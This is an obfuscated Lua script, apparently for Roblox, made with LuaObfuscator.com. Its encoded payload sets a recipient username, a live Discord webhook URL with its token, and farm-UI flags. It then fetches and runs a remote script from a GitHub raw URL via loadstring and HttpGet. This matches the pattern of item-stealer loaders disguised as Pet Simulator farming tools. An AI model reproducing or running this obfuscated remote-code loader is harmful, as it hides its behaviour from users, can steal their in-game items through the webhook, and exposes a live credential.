--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.3) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...) return {...},v12("#",...);end v18=6;end if (v18==2) then function v22() local v31=619 -(555 + 64) ;local v32;while true do if (v31==(0 -0)) then v32=v1(v16,v19,v19);v19=v19 + (2 -1) ;v31=(932 -(857 + 74)) -0 ;end if (v31==(2 -1)) then return v32;end end end v23=nil;function v23() local v33=568 -(367 + 201) ;local v34;local v35;while true do if (v33==(928 -(214 + 713))) then return (v35 * 256) + v34 ;end if ((0 + (0 -0))==v33) then v34,v35=v1(v16,v19,v19 + 1 + 1 );v19=v19 + (879 -(282 + 595)) ;v33=1271 -((343 -(32 + 85)) + 1044) ;end end end v18=3;end if (v18==4) then function v25() local v36=v24();local v37=v24();local v38=1 + 0 ;local v39=(v21(v37,998 -(393 + 522 + 82) ,(8 -3) + 15 ) * ((2 + 0)^(41 -9))) + v36 ;local v40=v21(v37,978 -(892 + 65) ,70 -(477 -(145 + 293)) );local v41=((v21(v37,75 -43 )==(1 -0)) and  -(1 -0)) or (351 -(87 + 263)) ;if (v40==((610 -(44 + 386)) -(67 + (1599 -(998 + 488))))) then if (v39==(0 + 0)) then return v41 * ((0 + 0) -0) ;else v40=1 + 0 ;v38=0 -0 ;end elseif (v40==(2065 -(10 + 7 + 1))) then return ((v39==(952 -(802 + (922 -(201 + 571))))) and (v41 * ((2 -1)/(0 -0)))) or (v41 * NaN) ;end return v8(v41,v40-(1465 -(416 + 26)) ) * (v38 + (v39/((6 -4)^((1176 -(116 + 1022)) + 14)))) ;end v26=nil;function v26(v42) local v43=0 + 0 ;local v44;local v45;while true do if ((1 + 0)==v43) then v44=v3(v16,v19,(v19 + v42) -((3050 -2164) -(261 + 624)) );v19=v19 + v42 ;v43=8 -6 ;end if (v43==(2 + 0)) then v45={};for v79=3 -2 , #v44 do v45[v79]=v2(v1(v3(v44,v79,v79)));end v43=1426 -(630 + (2540 -(760 + 987))) ;end if (v43==(0 -0)) then v44=nil;if  not v42 then v42=v24();if (v42==(859 -(814 + 45))) then return "";end end v43=1 + 0 ;end if (v43==(7 -4)) then return v6(v45);end end end v18=5;end if (v18==6) then v29=nil;function v29() local v46=0;local v47;local v48;local v49;local v50;local v51;local v52;local v53;while true do if (v46==(891 -(117 + 771))) then v53=nil;while true do local v81=0;local v82;while true do if (v81~=(402 -(108 + 294))) then else v82=1489 -(570 + 919) ;while true do if (v82==1) then if (v47~=2) then else local v109=0 -0 ;while true do if (v109~=(812 -(569 + 242))) then else return v51;end if (v109~=0) then else local v133=0;local v134;while true do if (v133~=0) then else v134=0 -0 ;while true do if (v134~=0) then else local v186=0;while true do if ((0 + 0)~=v186) then else for v190=1,v24() do local v191=1024 -(706 + 318) ;local v192;local v193;local v194;local v195;while true do if ((1252 -(721 + 530))~=v191) then else v194=nil;v195=nil;v191=1273 -(945 + 326) ;end if (v191~=0) then else v192=0;v193=nil;v191=2 -1 ;end if (v191==(2 + 0)) then while true do if (v192~=(701 -(271 + 429))) then else v195=nil;while true do if (v193~=(1 + 0)) then else while true do if ((1500 -(1408 + 92))==v194) then v195=v22();if (v21(v195,1087 -(461 + 625) ,1)==0) then local v211=0;local v212;local v213;local v214;local v215;local v216;while true do if (v211~=(1290 -(993 + 295))) then else v216=nil;while true do if (v212~=2) then else while true do if (v213==2) then local v220=0 + 0 ;while true do if (v220==(1172 -(418 + 753))) then v213=2 + 1 ;break;end if ((0 + 0)==v220) then if (v21(v215,1 + 0 ,1)==1) then v216[2]=v53[v216[1 + 1 ]];end if (v21(v215,531 -(406 + 123) ,1771 -(1749 + 20) )==(1 + 0)) then v216[1325 -(1249 + 73) ]=v53[v216[3]];end v220=1;end end end if (v213~=1) then else local v221=0;local v222;while true do if (v221~=(0 + 0)) then else v222=1145 -(466 + 679) ;while true do if (v222==0) then v216={v23(),v23(),nil,nil};if (v214==0) then local v231=0 -0 ;local v232;while true do if (v231==0) then v232=0;while true do if (v232==0) then v216[1903 -(106 + 1794) ]=v23();v216[4]=v23();break;end end break;end end elseif (v214==(1 + 0)) then v216[1 + 2 ]=v24();elseif (v214==2) then v216[8 -5 ]=v24() -((5 -3)^16) ;elseif (v214~=3) then else local v237=114 -(4 + 110) ;local v238;while true do if (v237==(584 -(57 + 527))) then v238=0;while true do if (v238~=0) then else v216[3]=v24() -((1429 -(41 + 1386))^(119 -(17 + 86))) ;v216[4]=v23();break;end end break;end end end v222=1 + 0 ;end if ((1 -0)~=v222) then else v213=2;break;end end break;end end end if (v213==3) then if (v21(v215,3,3)==(2 -1)) then v216[170 -(122 + 44) ]=v53[v216[6 -2 ]];end v48[v190]=v216;break;end if (v213~=0) then else local v224=0;while true do if ((0 -0)~=v224) then else v214=v21(v195,2 + 0 ,3);v215=v21(v195,4,1 + 5 );v224=1 -0 ;end if ((66 -(30 + 35))~=v224) then else v213=1 + 0 ;break;end end end end break;end if (v212~=(1258 -(1043 + 214))) then else v215=nil;v216=nil;v212=7 -5 ;end if (v212~=0) then else local v219=0;while true do if (v219==(1212 -(323 + 889))) then v213=0 -0 ;v214=nil;v219=581 -(361 + 219) ;end if (v219~=(321 -(53 + 267))) then else v212=1;break;end end end end break;end if ((0 + 0)~=v211) then else v212=413 -(15 + 398) ;v213=nil;v211=1;end if (1==v211) then v214=nil;v215=nil;v211=984 -(18 + 964) ;end end end break;end end break;end if (v193==0) then local v206=0 -0 ;local v207;while true do if (v206~=(0 + 0)) then else v207=0 + 0 ;while true do if (v207==0) then local v217=850 -(20 + 830) ;while true do if (0~=v217) then else v194=0;v195=nil;v217=1;end if (v217~=(1 + 0)) then else v207=1;break;end end end if (v207==(127 -(116 + 10))) then v193=1;break;end end break;end end end end break;end if (0==v192) then local v204=0;while true do if (v204==1) then v192=1;break;end if (v204~=0) then else v193=0 + 0 ;v194=nil;v204=739 -(542 + 196) ;end end end end break;end end end for v196=1,v24() do v49[v196-(1 -0) ]=v29();end v186=1;end if (v186==1) then v134=1 + 0 ;break;end end end if (1~=v134) then else v109=1 + 0 ;break;end end break;end end end end end break;end if (v82~=0) then else local v108=0 + 0 ;while true do if (0==v108) then if (v47~=(0 -0)) then else local v135=0;local v136;while true do if (v135~=0) then else v136=0 -0 ;while true do if ((1553 -(1126 + 425))~=v136) then else v47=1;break;end if ((405 -(118 + 287))~=v136) then else v48={};v49={};v136=3 -2 ;end if (v136==(1122 -(118 + 1003))) then local v187=0;while true do if (v187~=1) then else v136=2;break;end if (v187==(0 -0)) then v50={};v51={v48,v49,nil,v50};v187=978 -(553 + 424) ;end end end end break;end end end if (v47==1) then local v137=0;while true do if (v137==(1 -0)) then local v151=0 + 0 ;while true do if (v151==(1 + 0)) then v137=2 + 0 ;break;end if (v151==0) then local v188=0 + 0 ;while true do if (v188~=(0 + 0)) then else for v198=2 -1 ,v52 do local v199=0;local v200;local v201;local v202;local v203;while true do if (v199~=(0 -0)) then else v200=0;v201=nil;v199=2 -1 ;end if (v199~=1) then else v202=nil;v203=nil;v199=2;end if (v199==(1 + 1)) then while true do if (v200~=(0 -0)) then else local v205=753 -(239 + 514) ;while true do if (v205==(1 + 0)) then v200=1;break;end if (v205==(1329 -(797 + 532))) then v201=0 + 0 ;v202=nil;v205=1 + 0 ;end end end if (v200==1) then v203=nil;while true do if (v201~=1) then else if (v202==(2 -1)) then v203=v22()~=(1202 -(373 + 829)) ;elseif (v202==(733 -(476 + 255))) then v203=v25();elseif (v202==3) then v203=v26();end v53[v198]=v203;break;end if (v201==0) then local v209=0;local v210;while true do if ((1130 -(369 + 761))==v209) then v210=0;while true do if (v210~=1) then else v201=1;break;end if (v210~=(0 + 0)) then else local v218=0 -0 ;while true do if (v218==1) then v210=1;break;end if (v218~=0) then else v202=v22();v203=nil;v218=1 -0 ;end end end end break;end end end end break;end end break;end end end v51[241 -(64 + 174) ]=v22();v188=1 + 0 ;end if (v188==(1 -0)) then v151=337 -(144 + 192) ;break;end end end end end if (v137~=(218 -(42 + 174))) then else v47=2;break;end if (v137~=(0 + 0)) then else local v152=0;while true do if (v152==(1 + 0)) then v137=1 + 0 ;break;end if (v152~=0) then else v52=v24();v53={};v152=1505 -(363 + 1141) ;end end end end end v108=1;end if (v108~=1) then else v82=1;break;end end end end break;end end end break;end if (v46~=(1580 -(1183 + 397))) then else local v73=0 -0 ;while true do if (v73==0) then v47=0;v48=nil;v73=1 + 0 ;end if (v73~=1) then else v46=1 + 0 ;break;end end end if (v46~=1) then else local v74=1975 -(1913 + 62) ;local v75;while true do if ((0 + 0)==v74) then v75=0 -0 ;while true do if (v75~=(1934 -(565 + 1368))) then else v46=7 -5 ;break;end if (v75~=(1661 -(1477 + 184))) then else local v107=0;while true do if (v107~=(0 -0)) then else v49=nil;v50=nil;v107=1;end if (v107~=(1 + 0)) then else v75=1;break;end end end end break;end end end if (v46~=2) then else v51=nil;v52=nil;v46=3;end end end v30=nil;v18=7;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v54) if (v1(v54,2)==79) then v20=v0(v3(v54,1,1));return "";else local v69=v2(v0(v54,16));if v20 then local v83=0;local v84;while true do if (v83==1) then return v84;end if (v83==0) then v84=v5(v69,v20);v20=nil;v83=1;end end else return v69;end end end);v18=1;end if (v18==3) then v24=nil;function v24() local v55,v56,v57,v58=v1(v16,v19,v19 + (859 -(564 + 292)) );v19=v19 + (6 -2) ;return (v58 * 16777216) + (v57 * (197536 -(101497 + 30503))) + (v56 * (560 -(244 + 60))) + v55 ;end v25=nil;v18=4;end if (v18==7) then function v30(v59,v60,v61) local v62=0;local v63;local v64;local v65;while true do if (v62==0) then v63=v59[1];v64=v59[2];v62=1;end if (v62==1) then v65=v59[3];return function(...) local v85=v63;local v86=v64;local v87=v65;local v88=v28;local v89=1;local v90= -1;local v91={};local v92={...};local v93=v12("#",...) -1 ;local v94={};local v95={};for v99=0,v93 do if (v99>=v87) then v91[v99-v87 ]=v92[v99 + 1 ];else v95[v99]=v92[v99 + 1 ];end end local v96=(v93-v87) + 1 ;local v97;local v98;while true do local v100=0;while true do if (v100==1) then if (v98<=4) then if (v98<=1) then if (v98==0) then local v110=v97[2];local v111=v95[v97[3]];v95[v110 + 1 ]=v111;v95[v110]=v111[v97[4]];else v95[v97[2]]();end elseif (v98<=2) then v95[v97[2]]=v97[3];elseif (v98>3) then local v140=0;while true do if (v140==4) then v95[v97[2]]=v97[3];v89=v89 + 1 ;v97=v85[v89];v140=5;end if (v140==7) then v61[v97[3]]=v95[v97[2]];v89=v89 + 1 ;v97=v85[v89];v140=8;end if (v140==3) then v61[v97[3]]=v95[v97[2]];v89=v89 + 1 ;v97=v85[v89];v140=4;end if (v140==0) then v95[v97[2]]=v97[3];v89=v89 + 1 ;v97=v85[v89];v140=1;end if (v140==5) then v61[v97[3]]=v95[v97[2]];v89=v89 + 1 ;v97=v85[v89];v140=6;end if (v140==9) then v61[v97[3]]=v95[v97[2]];break;end if (v140==8) then v95[v97[2]]=v97[3];v89=v89 + 1 ;v97=v85[v89];v140=9;end if (2==v140) then v95[v97[2]]=v97[3]~=0 ;v89=v89 + 1 ;v97=v85[v89];v140=3;end if (1==v140) then v61[v97[3]]=v95[v97[2]];v89=v89 + 1 ;v97=v85[v89];v140=2;end if (v140==6) then v95[v97[2]]=v97[3]~=0 ;v89=v89 + 1 ;v97=v85[v89];v140=7;end end else v61[v97[3]]=v95[v97[2]];end elseif (v98<=7) then if (v98<=5) then local v117=v97[2];v95[v117]=v95[v117](v13(v95,v117 + 1 ,v90));elseif (v98>6) then local v143=0;local v144;local v145;local v146;local v147;while true do if (v143==2) then for v183=v144,v90 do v147=v147 + 1 ;v95[v183]=v145[v147];end break;end if (v143==1) then v90=(v146 + v144) -1 ;v147=0;v143=2;end if (v143==0) then v144=v97[2];v145,v146=v88(v95[v144](v13(v95,v144 + 1 ,v97[3])));v143=1;end end else do return;end end elseif (v98<=8) then local v119;local v120,v121;local v122;local v123;v95[v97[2]]=v61[v97[3]];v89=v89 + 1 ;v97=v85[v89];v123=v97[2];v122=v95[v97[3]];v95[v123 + 1 ]=v122;v95[v123]=v122[v97[4]];v89=v89 + 1 ;v97=v85[v89];v95[v97[2]]=v97[3];v89=v89 + 1 ;v97=v85[v89];v123=v97[2];v120,v121=v88(v95[v123](v13(v95,v123 + 1 ,v97[3])));v90=(v121 + v123) -1 ;v119=0;for v138=v123,v90 do local v139=0;while true do if (v139==0) then v119=v119 + 1 ;v95[v138]=v120[v119];break;end end end v89=v89 + 1 ;v97=v85[v89];v123=v97[2];v95[v123]=v95[v123](v13(v95,v123 + 1 ,v90));v89=v89 + 1 ;v97=v85[v89];v95[v97[2]]();v89=v89 + 1 ;v97=v85[v89];do return;end elseif (v98==9) then v95[v97[2]]=v97[3]~=0 ;else v95[v97[2]]=v61[v97[3]];end v89=v89 + 1 ;break;end if (v100==0) then v97=v85[v89];v98=v97[1];v100=1;end end end end;end end end return v30(v29(),{},v17)(...);end if (v18==1) then v21=nil;function v21(v66,v67,v68) if v68 then local v70=476 -(41 + (815 -380)) ;local v71;while true do if (v70==(0 -0)) then v71=(v66/((2 -0)^(v67-((2685 -1683) -(938 + 63)))))%((1877 -(157 + 1718))^(((v68-((1228 -(322 + 905)) + 0)) -(v67-(1 + 0))) + (1126 -(936 + 189)))) ;return v71-(v71%(1 + 0)) ;end end else local v72=(1615 -(1565 + (110 -62)))^(v67-(1 + 0)) ;return (((v66%(v72 + v72))>=v72) and (2 -1)) or (1138 -(782 + 139 + 217)) ;end end v22=nil;v18=2;end end end return v15("LOL!0C3O0003083O00557365726E616D65030C3O006368616B696D6F66696E6134030D3O006C6F6164696E677363722O656E03053O0064656C6179028O0003063O006661726D756903073O00776562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O3135393233373034363930393533343235382F43614F42794353624935414D634A78423862706B73717A364E585750625A322O41533942306F757956502D6443755339372D506463763946704A776D4D37446F4B747948030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403493O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4A757374616E6F74686572646D652F70657473696D782O322F6D61696E2F70657473392E6C756100123O0012043O00023O00124O00018O00013O00124O00033O00124O00053O00124O00048O00013O00124O00063O00124O00083O00124O00073O00120A3O00093O0012080001000A3O00202O00010001000B00122O0003000C6O000100039O0000026O000100016O00017O00",v9(),...);
